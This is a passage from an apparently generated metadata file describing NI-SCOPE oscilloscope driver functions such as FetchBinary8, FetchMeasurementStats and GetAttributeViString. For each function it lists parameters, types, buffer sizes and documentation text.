'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchBinary8': {
'codegen_method': 'private',
'documentation': {
'description': '\nRetrieves data from a previously initiated acquisition and returns\nbinary 8-bit waveforms. This function may return multiple waveforms\ndepending on the number of channels, the acquisition type, and the\nnumber of records you specify.\n\nRefer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information on using this function.\n',
'note': '\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'fetch_into',
'method_templates': [
{
'method_python_name_suffix': '_into_numpy',
'session_filename': 'numpy_read_method'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumWfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'numpy': True,
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViInt8[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchComplex': {
'codegen_method': 'no',
'documentation': {
'description': '\nRetrieves data that the digitizer has acquired from a previously\ninitiated acquisition and returns a one-dimensional array of complex,\nscaled waveforms.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumWfms to determine the number of\nwaveforms.\n'
},
'name': 'wfm',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'NIComplexNumber[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchComplexBinary16': {
'codegen_method': 'no',
'documentation': {
'description': '\nRetrieves data from single channels and records. Returns a\none-dimensional array of complex binary 16-bit waveforms.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumWfms to determine the number of\nwaveforms.\n'
},
'name': 'wfm',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'NIComplexI16[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchDispatcher': {
'codegen_method': 'python-only',
'documentation': {
'description': '\nReturns the waveform from a previously initiated acquisition that the\ndigitizer acquires for the specified channel. This function returns\nscaled voltage waveforms.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.',
'note': 'Some functionality, such as time stamping, is not supported in all digitizers.'
},
'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '_into',
'session_filename': 'fetch_waveform'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The channel(s) to fetch from.'
},
'name': 'channelList',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': "\nnumpy array of the appropriate type and size that should be acquired as a 1D array. Size should be **num_samples** times number of waveforms. Call niScope_ActualNumWfms to determine the number of waveforms.\n\nTypes supported are\n\n- `numpy.float64`\n- `numpy.int8`\n- `numpy.int16`\n- `numpy.int32`\n\nExample:\n\n.. code-block:: python\n\n    waveform = numpy.ndarray(num_samples * session.actual_num_wfms(), dtype=numpy.float64)\n    wfm_info = session['0,1'].fetch_into(num_samples, waveform, timeout=5.0)"
},
'name': 'waveform',
'numpy': True,
'type': 'ViReal64',
'use_array': True
},
{
'default_value': 'FetchRelativeTo.PRETRIGGER',
'direction': 'in',
'documentation': {
'description': 'Position to start fetching within one record.'
},
'enum': 'FetchRelativeTo',
'name': 'relativeTo',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Offset in samples to start fetching data within each record. The offset can be positive or negative.'
},
'name': 'offset',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Zero-based index of the first record to fetch.'
},
'name': 'recordNumber',
'type': 'ViInt32'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'Number of records to fetch. Use -1 to fetch all configured records.'
},
'name': 'numRecords',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': 'The time to wait in seconds for data to be acquired; using 0 for this parameter tells NI-SCOPE to fetch whatever is currently available. Using -1 for this parameter implies infinite timeout.'
},
'name': 'timeout',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of classes with the following timing and scaling information about each waveform:\n\n- **relative_initial_x** (float) the time (in seconds) from the trigger to the first sample in the fetched waveform\n- **absolute_initial_x** (float) timestamp (in seconds) of the first fetched sample. This timestamp is comparable between records and acquisitions; devices that do not support this parameter use 0 for this output.\n- **x_increment** (float) the time between points in the acquired waveform in seconds\n- **channel** (str) channel name this waveform was acquired from\n- **record** (int) record number of this waveform\n- **gain** (float) the gain factor of the given channel; useful for scaling binary data with the following formula:\n\n    .. math::\n\n        voltage = binary data * gain factor + offset\n\n- **offset** (float) the offset factor of the given channel; useful for scaling binary data with the following formula:\n\n    .. math::\n\n        voltage = binary data * gain factor + offset\n\n- **samples** (array of float) floating point array of samples. Length will be of the actual samples acquired\n'
},
'name': 'wfmInfo',
'type': 'struct niScope_wfmInfo'
}
],
'python_name': 'fetch',
'returns': 'ViStatus'
},
'FetchMeasurement': {
'codegen_method': 'private',
'documentation': {
'description': '\nFetches a waveform from the digitizer and performs the specified\nwaveform measurement. Refer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information.\n\nMany of the measurements use the low, mid, and high reference levels.\nYou configure the low, mid, and high references by using\nNISCOPE_ATTR_MEAS_CHAN_LOW_REF_LEVEL,\nNISCOPE_ATTR_MEAS_CHAN_MID_REF_LEVEL, and\nNISCOPE_ATTR_MEAS_CHAN_HIGH_REF_LEVEL to set each channel\ndifferently.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `scalar\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(scalar_measurements_refs)>`__\nto be performed.\n'
},
'enum': 'ScalarMeasurement',
'name': 'scalarMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nContains an array of all measurements acquired; call\nniScope_ActualNumWfms to determine the array length.\n'
},
'name': 'result',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
}
],
'returns': 'ViStatus'
},
'FetchMeasurementStats': {
'codegen_method': 'private',
'documentation': {
'description': '\nObtains a waveform measurement and returns the measurement value. This\nfunction may return multiple statistical results depending on the number\nof channels, the acquisition type, and the number of records you\nspecify.\n\nYou specify a particular measurement type, such as rise time, frequency,\nor voltage peak-to-peak. The waveform on which the digitizer calculates\nthe waveform measurement is from an acquisition that you previously\ninitiated. The statistics for the specified measurement function are\nreturned, where the statistics are updated once every acquisition when\nthe specified measurement is fetched by any of the Fetch Measurement\nfunctions. If a Fetch Measurement function has not been called, this\nfunction fetches the data on which to perform the measurement. The\nstatistics are cleared by calling\nniScope_ClearWaveformMeasurementStats. Refer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information on incorporating fetch functions in your application.\n\nMany of the measurements use the low, mid, and high reference levels.\nYou configure the low, mid, and high references with\nNISCOPE_ATTR_MEAS_CHAN_LOW_REF_LEVEL,\nNISCOPE_ATTR_MEAS_CHAN_MID_REF_LEVEL, and\nNISCOPE_ATTR_MEAS_CHAN_HIGH_REF_LEVEL to set each channel\ndifferently.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `scalar\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(scalar_measurements_refs)>`__\nto be performed on each fetched waveform.\n'
},
'enum': 'ScalarMeasurement',
'name': 'scalarMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': 'Returns the resulting measurement'
},
'name': 'result',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the mean scalar value, which is obtained by averaging each\nniScope_FetchMeasurementStats call.\n'
},
'name': 'mean',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the standard deviation of the most recent **numInStats**\nmeasurements.\n'
},
'name': 'stdev',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the smallest scalar value acquired (the minimum of the\n**numInStats** measurements).\n'
},
'name': 'min',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the largest scalar value acquired (the maximum of the\n**numInStats** measurements).\n'
},
'name': 'max',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the number of times niScope_FetchMeasurementStats has been\ncalled.\n'
},
'name': 'numInStats',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViInt32[]'
}
],
'returns': 'ViStatus'
},
'FetchWaveform': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the waveform from a previously initiated acquisition that the\ndigitizer acquires for the channel you specify.\n\nniScope_InitiateAcquisition starts an acquisition on the channels that\nyou enable with niScope_ConfigureVertical. The digitizer acquires\nwaveforms for the enabled channels concurrently. You use\nniScope_AcquisitionStatus to determine when the acquisition is\ncomplete. You must call this function separately for each enabled\nchannel to obtain the waveforms.\n\nYou can call niScope_ReadWaveform instead of\nniScope_InitiateAcquisition. niScope_ReadWaveform starts an\nacquisition on all enabled channels, waits for the acquisition to\ncomplete, and returns the waveform for the channel you specify. Call\nthis function to obtain the waveforms for each of the remaining\nchannels.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of elements to insert into the **waveform** array.'
},
'name': 'waveformSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the waveform that the digitizer acquires.\n\nUnits: volts\n\n| Notes:\n| If the digitizer cannot sample a point in the waveform, this function\n returns an error.\n'
},
'name': 'waveform',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the actual number of points the function placed in the\n**waveform** array.\n'
},
'name': 'actualPoints',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the time of the first point in the **waveform** array relative\nto the Reference Position.\n\nUnits: seconds\n\nFor example, if the digitizer acquires the first point in the\n**waveform** array 1 second before the trigger, this parameter returns\nthe value –1.0. If the acquisition of the first point occurs at the same\ntime as the trigger, this parameter returns the value 0.0.\n'
},
'name': 'initialX',
'type': 'ViReal64'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the length of time between points in the **waveform** array.\n\nUnits: seconds\n'
},
'name': 'xIncrement',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'FetchWaveformMeasurement': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigure the appropriate reference levels before calling this function.\nYou can configure the low, mid, and high references by setting the\nfollowing attributes:\n\n| NISCOPE_ATTR_MEAS_HIGH_REF\n| NISCOPE_ATTR_MEAS_LOW_REF\n| NISCOPE_ATTR_MEAS_MID_REF\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nYou can use niScope_ReadWaveformMeasurement instead of this function.\nniScope_ReadWaveformMeasurement starts an acquisition on all enabled\nchannels, waits for the acquisition to complete, obtains a waveform\nmeasurement on the specified channel, and returns the waveform for the\nspecified channel. Call this function separately to obtain any other\nwaveform measurements on a specific channel.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'Characteristic of the acquired waveform to be measured.'
},
'name': 'measFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': 'The measured value.'
},
'name': 'measurement',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'GetAttributeViBoolean': {
'codegen_method': 'private',
'documentation': {
'description': '\nQueries the value of a ViBoolean attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the current value of the attribute; pass the address of a\nViBoolean variable.\n'
},
'name': 'value',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'GetAttributeViInt32': {
'codegen_method': 'private',
'documentation': {
'description': '\nQueries the value of a ViInt32 attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': 'Returns the current value of the attribute.'
},
'name': 'value',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'GetAttributeViInt64': {
'codegen_method': 'private',
'documentation': {
'description': '\nQueries the value of a ViInt64 attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': 'Returns the current value of the attribute.'
},
'name': 'value',
'type': 'ViInt64'
}
],
'returns': 'ViStatus'
},
'GetAttributeViReal64': {
'codegen_method': 'private',
'documentation': {
'description': '\nQueries the value of a ViReal64 attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the current value of the attribute; pass the address of a\nViReal64 variable.\n'
},
'name': 'value',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'GetAttributeViSession': {
'codegen_method': 'no',
'documentation': {
'description': '\nQueries the value of a ViSession attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the current value of the attribute; pass the address of a\nViSession variable.\n'
},
'name': 'value',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'GetAttributeViString': {
'codegen_method': 'private',
'documentation': {
'description': '\nQueries the value of a ViString attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n\nYou must provide a ViChar array to serve as a buffer for the value. You\npass the number of bytes in the buffer as the **bufSize**. If the\ncurrent value of the attribute, including the terminating NUL byte, is\nlarger than the size you indicate in the **bufSize**, the function\ncopies (**bufSize** – 1) bytes into the buffer, places an ASCII NUL byte\nat the end of the buffer, and returns the **bufSize** you must pass to\nget the entire value. For example, if the value is 123456 and the\n**bufSize** is 4, the function places 123 into the buffer and returns 7.\nIf you want to call this function just to get the required buffer size,\nyou can pass 0 for the **bufSize** and VI_NULL for the **value**.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of bytes in the ViChar array you specify for **value**.'
},
'name': 'bufSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nThe buffer in which the function returns the current value of the\nattribute; the buffer must be of type ViChar and have at least as many\nbytes as indicated in the **bufSize**.\n'
},
'name': 'value',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetChannelName': {
'codegen_method': 'no',
'documentation': {
